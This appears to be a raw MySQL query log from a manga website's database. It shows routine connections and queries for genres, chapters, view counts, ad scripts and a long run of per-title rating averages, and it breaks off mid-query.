u317079482_mangaberri_1 using Socket 330657181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657180 Quit 330657181 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Action%' and m.active=1) as k where latest_chapter_id > 0 330657181 Quit 330657182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657182 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where m.active= 1 and m.genres like '%Action%' group by manga_id ORDER BY sum(view) DESC 330657183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657183 Quit 330657184 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12398' and m.active = 1 330657185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657184 Quit 330657185 Query select * FROM chapters where id = '12398' 330657185 Quit 330657186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657186 Query select * FROM chapters where manga_id = '275' order by display_priority ASC, id desc 330657186 Quit 330657187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657187 Query Update chapters set view=view+1 where id = '12398' 330657187 Quit 330657188 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657188 Query select * FROM chapters where id = '12398' 330657188 Quit 330657189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657189 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12398' and m.active = 1 330657189 Quit 330657190 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657190 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('275', '12398', '47.79.200.64', 'mangaberri.com', '2026-02-26 03:29:47', '2026-02-26 03:29:47') 330657190 Quit 330657191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657191 Query select * FROM chapter_images where chapter_id = '12398' 330657191 Quit 330657192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657192 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '275' and m.active = 1 330657193 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657192 Quit 330657193 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='275' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Crime%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Manhwa/Manhua%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330657193 Quit 330657194 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657194 Quit 330657195 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657195 Quit 330657196 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657196 Quit 330657197 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657182 Quit 330657197 Quit 330657198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657198 Quit 330657200 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657199 Quit 330657201 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657200 Quit 330657201 Quit 330657202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657202 Quit 330657203 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657203 Quit 330657204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330657204 Quit 330657205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330657205 Quit 330657206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330657206 Quit 330657207 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330657207 Quit 330657208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330657208 Quit 330657209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330657209 Quit 330657210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330657210 Quit 330657211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330657211 Quit 330657212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330657212 Quit 330657213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330657213 Quit 330657214 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330657214 Quit 330657215 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330657215 Quit 330657216 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330657216 Quit 330657217 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330657217 Quit 330657218 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330657218 Quit 330657219 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330657219 Quit 330657220 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330657220 Quit 330657221 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330657221 Quit 330657222 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330657222 Quit 330657223 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330657223 Quit 330657224 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330657224 Quit 330657225 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330657225 Quit 330657226 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330657226 Quit 330657227 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330657227 Quit 330657228 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330657228 Quit 330657229 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330657229 Quit 330657230 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330657230 Quit 330657231 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330657231 Quit 330657232 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330657232 Quit 330657233 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330657233 Quit 330657234 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330657234 Quit 330657235 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330657235 Quit 330657236 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330657236 Quit 330657237 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330657237 Quit 330657238 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330657238 Quit 330657239 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330657239 Quit 330657240 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330657240 Quit 330657241 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330657241 Quit 330657242 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330657242 Quit 330657243 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330657243 Quit 330657244 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330657244 Quit 330657245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330657245 Quit 330657246 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330657246 Quit 330657247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330657247 Quit 330657248 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330657248 Quit 330657249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330657249 Quit 330657250 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330657250 Quit 330657251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330657251 Quit 330657252 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330657252 Quit 330657253 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330657253 Quit 330657254 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330657254 Quit 330657255 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330657255 Quit 330657256 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330657256 Quit 330657257 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330657257 Quit 330657258 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330657258 Quit 330657259 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330657259 Quit 330657260 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330657260 Quit 330657261 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330657261 Quit 330657262 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330657262 Quit 330657263 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330657263 Quit 330657264 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330657264 Quit 330657265 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330657265 Quit 330657266 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330657266 Quit 330657267 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330657267 Quit 330657268 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330657268 Quit 330657269 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330657269 Quit 330657270 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330657270 Quit 330657271 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330657271 Quit 330657272 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330657272 Quit 330657273 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330657273 Quit 330657274 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330657274 Quit 330657275 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330657275 Quit 330657276 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330657276 Quit 330657277 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330657277 Quit 330657278 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330657278 Quit 330657279 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330657279 Quit 330657280 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330657280 Quit 330657281 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330657281 Quit 330657282 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330657282 Quit 330657283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330657283 Quit 330657284 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330657284 Quit 330657285 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330657285 Quit 330657286 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330657286 Quit 330657287 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330657287 Quit 330657288 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330657288 Quit 330657289 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330657289 Quit 330657290 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330657290 Quit 330657291 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330657291 Quit 330657292 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330657292 Quit 330657293 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330657293 Quit 330657294 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330657294 Quit 330657295 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330657295 Quit 330657296 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330657296 Quit 330657297 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330657297 Quit 330657298 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330657298 Quit 330657299 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330657299 Quit 330657300 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330657300 Quit 330657301 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330657301 Quit 330657302 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330657302 Quit 330657303 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330657303 Quit 330657304 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330657304 Quit 330657305 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330657305 Quit 330657306 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330657306 Quit 330657307 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330657307 Quit 330657308 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330657308 Quit 330657309 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330657309 Quit 330657310 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330657310 Quit 330657311 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330657311 Quit 330657312 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330657312 Quit 330657313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330657313 Quit 330657314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330657314 Quit 330657315 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330657315 Quit 330657316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330657316 Quit 330657317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330657317 Quit 330657318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330657318 Quit 330657319 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330657319 Quit 330657320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330657320 Quit 330657321 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330657321 Quit 330657322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330657322 Quit 330657323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330657323 Quit 330657324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330657324 Quit 330657325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330657325 Quit 330657326 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330657326 Quit 330657327 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330657327 Quit 330657328 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330657328 Quit 330657329 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330657329 Quit 330657330 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330657330 Quit 330657331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330657331 Quit 330657332 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657332 Query select count(id) as total_rating, (sum(rating) / count(id)) as 